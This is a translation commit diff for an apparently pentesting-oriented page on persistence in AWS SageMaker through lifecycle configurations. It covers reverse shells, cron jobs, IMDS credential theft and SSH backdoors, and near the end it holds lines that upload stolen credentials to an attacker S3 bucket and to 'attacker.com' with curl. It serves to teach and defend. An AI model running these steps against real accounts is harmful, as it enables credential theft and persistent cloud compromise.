Translated ['src/pentesting-ci-cd/ansible-tower-awx-automation-controlle

This commit is contained in:
Translator
2025-08-01 10:17:06 +00:00
parent 66a462aa95
commit 83bb7cf26a
47 changed files with 591 additions and 409 deletions

View File

@@ -1 +1,3 @@
# AWS - 永続性
# AWS - Persistence
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,12 +1,14 @@
# AWS - SageMaker Lifecycle Configuration Persistence
# Aws Sagemaker Persistence
## Overview of Persistence Techniques
{{#include ../../../banners/hacktricks-training.md}}
このセクションでは、Lifecycle Configurations (LCCs) を悪用して SageMaker に持続性を持たせる方法について説明します。これには、リバースシェル、cron ジョブ、IMDS を介した資格情報の盗難、SSH バックドアが含まれます。これらのスクリプトはインスタンスの IAM ロールで実行され、再起動を超えて持続することができます。ほとんどの技術はアウトバウンドネットワークアクセスを必要としますが、AWS コントロールプレーン上のサービスを使用することで、環境が「VPC のみ」モードであっても成功する可能性があります。
#### 注意: SageMaker ノートブックインスタンスは、機械学習ワークロード専用に構成された管理された EC2 インスタンスです。
## Persistence Techniquesの概要
## Required Permissions
* Notebook Instances:
このセクションでは、Lifecycle Configurations (LCCs)を悪用してSageMakerで永続性を得る方法について説明します。これには、リバースシェル、cronジョブ、IMDSを介した資格情報の盗難、SSHバックドアが含まれます。これらのスクリプトはインスタンスのIAMロールで実行され、再起動を超えて永続化することができます。ほとんどの技術はアウトバウンドネットワークアクセスを必要としますが、AWSコントロールプレーン上のサービスを使用することで、環境が「VPCのみ」モードであっても成功する可能性があります。
#### 注意: SageMakerートブックインスタンスは、機械学習ワークロード専用に構成された管理されたEC2インスタンスです。
## 必要な権限
* ノートブックインスタンス:
```
sagemaker:CreateNotebookInstanceLifecycleConfig
sagemaker:UpdateNotebookInstanceLifecycleConfig
@@ -101,8 +103,8 @@ aws sagemaker create-studio-lifecycle-config \
--studio-lifecycle-config-content $(base64 -w0 editor_persist.sh)
```
### 重要な情報:
* ドメインまたはスペースレベルでLCCをアタッチすると、スコープ内のすべてのユーザーまたはアプリケーションに影響を与えます。
* より高い権限が必要ですsagemaker:UpdateDomain、sagemaker:UpdateSpace、通常はドメインレベルよりもスペースレベルで実可能です。
* ドメインまたはスペースレベルでLCCをアタッチすると、範囲内のすべてのユーザーまたはアプリケーションに影響を与えます。
* より高い権限が必要ですsagemaker:UpdateDomain、sagemaker:UpdateSpace、通常はドメインレベルよりもスペースレベルで実可能です。
* ネットワークレベルの制御(例:厳格な出口フィルタリング)は、成功したリバースシェルやデータの流出を防ぐことができます。
## ライフサイクル構成を介したリバースシェル
@@ -153,4 +155,4 @@ aws s3 cp /tmp/creds.json $ATTACKER_BUCKET/$(hostname)-creds.json
curl -X POST -F "file=@/tmp/creds.json" http://attacker.com/upload
```
{{#include ../../../banners/hacktricks-training.md}}